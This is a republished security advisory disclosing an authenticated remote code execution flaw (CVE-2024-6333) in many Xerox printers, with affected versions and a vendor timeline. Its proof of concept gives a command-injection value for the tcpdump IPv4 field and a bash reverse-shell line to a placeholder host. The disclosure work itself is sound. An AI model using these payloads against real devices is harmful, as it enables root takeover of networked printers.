SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)

2024-10-29 09:54:20 Author: seclists.org(查看原文) 阅读量:17 收藏

SEC Consult Vulnerability Lab Security Advisory < 20241023-0 >
=======================================================================
              title: Authenticated Remote Code Execution
            product: Multiple Xerox printers
                     (EC80xx, AltaLink, VersaLink, WorkCentre)
 vulnerable version: see vulnerable versions below
      fixed version: see solution section below
         CVE number: CVE-2024-6333
             impact: high
           homepage: https://xerox.com
              found: 2023-12-14
                 by: Timo Longin (Office Vienna)
                     Tamas Jos (Office Zurich)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"We are a global leader in office and production print technology and related
solutions, with a large and growing presence in Digital and IT Services.
Having redefined the workplace experience for more than 100 years, our
differentiated business and technology offerings are empowering client success
today by addressing the productivity challenges of a hybrid workplace and
distributed workforce."

Source: https://investors.xerox.com/

Business recommendation:
------------------------
SEC Consult recommends Xerox customers to install the latest updates and review
the vendor's security note for further information.

Also make sure to have patches from previous security notes installed, such as
XRX23-020. SEC Consult has re-identified some critical 0-days (unauthenticated RCE,
partial authentication bypass) that were already patched but not clearly
communicated in the previous security notes.

SEC Consult highly recommends to perform a thorough security review of the product
conducted by security professionals to identify and resolve potential further
security issues.

Vulnerability overview/description:
-----------------------------------
1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)
An attacker authenticated as a user with administrative access to the
web interface of a range of affected Xerox printers can exploit a remote code
execution vulnerability (RCE) as root user. It allows an attacker to execute
commands directly on the operating system of the printer with root permissions.
Consequently, the target Xerox printer can be fully compromised.

Proof of concept:
-----------------
1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)
The "Network Troubleshooting" menu enables administrators to configure and run
network troubleshooting based on the tcpdump tool. The web interface allows to
apply custom filters like an IPv4 address as well as specific network services,
as seen in the image (figure 1) below.

<img Network_Troubleshooting.png>

Due to insufficient input validation in the IPv4 address value, an attacker
may inject further OS commands into the final tcpdump command string. For
example, by setting the IPv4 address to the value "0.0.0.0$(bash $TMP~cmd)",
commands stored under "/tmp/~cmd" get executed, when starting a network
troubleshooting session.

Note: The payload in the IPv4 address must bypass a character filter,
and was kept simple for demonstration purposes. Other payloads that directly
execute commands without requiring the "/tmp/~cmd" file exist and can be
crafted.

An attacker who, for example, has previously exploited the unauthenticated
RCE vulnerability (fixed with Xerox Security Bulletin XRX23-020) can plant
the following commands for a reverse shell in to "/tmp/~cmd".

-------------------------------------------------------------------------------

bash -i >/dev/tcp/X.X.X.X/10004 0>&1 2>&1

-------------------------------------------------------------------------------

Since, the network troubleshooting service is running tcpdump with root
permissions, full access to a range of Xerox printers can be obtained this way.
See figure 2 below.

<img reverse_shell.png>

Vulnerable versions:
-----------------------------
The following products & versions have been tested initially, which were not
patched to the latest version according to vendor. Hence our other identified
critical security issues were removed from this advisory.
* Xerox Workcentre 7970 (073.200.167.09610)
* Xerox Workcentre 7855 (073.040.167.09610)

According to the vendor, the following products are affected:

* AltaLink® B8045 / B8055 / B8065 / B8075 / B8090 (<103.xxx.024.18600 866140v3)
* AltaLink® C8030 / C8035 / C8045 / C8055 / C8070 (<103.xxx.024.18600 866140v3)
* Xerox® EC8036 / EC8056 (<103.xxx.024.18600 872818v3)
* Xerox® EC8036 / EC8056 - Common Criteria (June 2022) (<103.023.031.35105 878257v3)
* Xerox® EC8036 / EC8056 - Common Criteria (June 2024) (<103.xxx.013.14115 869823v3)
* AltaLink®C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)
* AltaLink® B8145 / B8155 / B8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)
* AltaLink® C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)
* AltaLink® B8145 / B8155 / B8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)
* VersaLink® B625 / C625 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)
* VersaLink® B415 / C415 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)
* WorkCentre 3655/3655i (<075.060.004.07810 via Upgrade Tool)
* WorkCentre 5945/55i (<075.091.004.07810 via Upgrade Tool)
* WorkCentre 6655/6655i (<075.110.004.07810 via Upgrade Tool)
* WorkCentre 7220/7225i (<075.030.004.07810 via Upgrade Tool)
* WorkCentre 7830/7835i (<075.010 004.07810 via Upgrade Tool)
* WorkCentre 7845/7855i (<075.040.004.07810 via Upgrade Tool)
* WorkCentre 7845/7855 (IBG) (<075.080.004.07810 via Upgrade Tool)
* WorkCentre 7970/7970i (<075.200.004.07810 via Upgrade Tool)
* WorkCentre EC7836 (<075.050.004.07810 via Upgrade Tool)
* WorkCentre EC7856 (<075.020.004.07810 via Upgrade Tool)

Vendor contact timeline:
------------------------
2024-02-05: Contacting vendor through the Xerox Security Response Center (XSRC)
            https://forms.business.xerox.com/en-us/xerox-security-response-center/
2024-02-06: Xerox assigns case id XSRC-2024-0003
2024-02-08: Xerox provides links for the current firmware versions to confirm
            whether the issues can be reproduced.
2024-02-27: Xerox asks for status update.
2024-02-28: The authenticated RCE was confirmed to be exploitable in the current
            firmware version (075.040.013.29000 and 075.200.013.29000).
            Vulnerability one and two are fixed in the most recent versions.
2024-03-19: Xerox requests more information on provided PoCs.
2024-04-02: SEC Consult provides the requested information.
2024-04-18: SEC Consult asks for updates on the vulnerability status.
2024-05-06: Xerox provides an update/patch for the affected WorkCentre7890 and 7855
            series.
2024-05-16: SEC Consult asks about a CVE number for the authenticated RCE
            vulnerability. Also SEC Consult inquires about for further plans on
            confirming the affected models and versions that are potentially
            affected by the partial authentication bypass and pre-authenticated RCE
            vulnerabilities.
2024-05-21: Xerox states that they are evaluating other models. Also, they request
            a CVSS score and vector for the authenticated RCE. Furthermore, more
            details on the public disclosure timeline are requested.
2024-05-23: SEC Consult provides the requested information.
2024-06-03: Status update from Xerox regarding CVE-ID request. Furthermore,
            more information on the to be released advisory is requested.
2024-06-06: Status update from Xerox regarding CVE-ID request.
2024-06-10: Xerox again requests a CVSS score and vector for the authenticated RCE.
2024-06-14: SEC Consult again provides the CVSS score and vector. Also, information
            on the to be released advisory is provided.
2024-06-25: Xerox provides CVE-2024-6333 for the authenticated RCE vulnerability.
2024-06-28: Informing Xerox about longer vacation period / absence.
            Asking again about further affected models.
2024-07-01: Xerox: Further models are affected, will be shared in the final publication.
2024-07-16: Xerox asks for our publication draft.
2024-07-31: Xerox asks again for our publication draft.
2024-07-31: SEC Consult reminds Xerox about vacation, references our draft advisory
            already sent a few months ago. Asking whether the other models are
            affected by the authenticated RCE only, or by the other identified
            vulnerabilities as well.
2024-08-28: Xerox provides high-level summary of the case, but no details on affected
            models.
2024-10-03: SEC Consult provides an updated advisory with minor changes to Xerox,
            again asking whether other versions and models are affected by the
            described vulnerabilities.
2024-10-07: Xerox provides further information on the partial authentication bypass
            and pre-authenticated RCE vulnerabilities, showing that these have been
            addressed in previous patches. Also, further coordination regarding
            Xerox' Security Bulletin Release.
2024-10-16: Release of Xerox Security Bulletin XRX24-015, covering the authenticated
            RCE vulnerability.
2024-10-21: Sending latest advisory draft to Xerox, setting release date to 23rd October.

Full Disclosure mailing list archives

Current thread: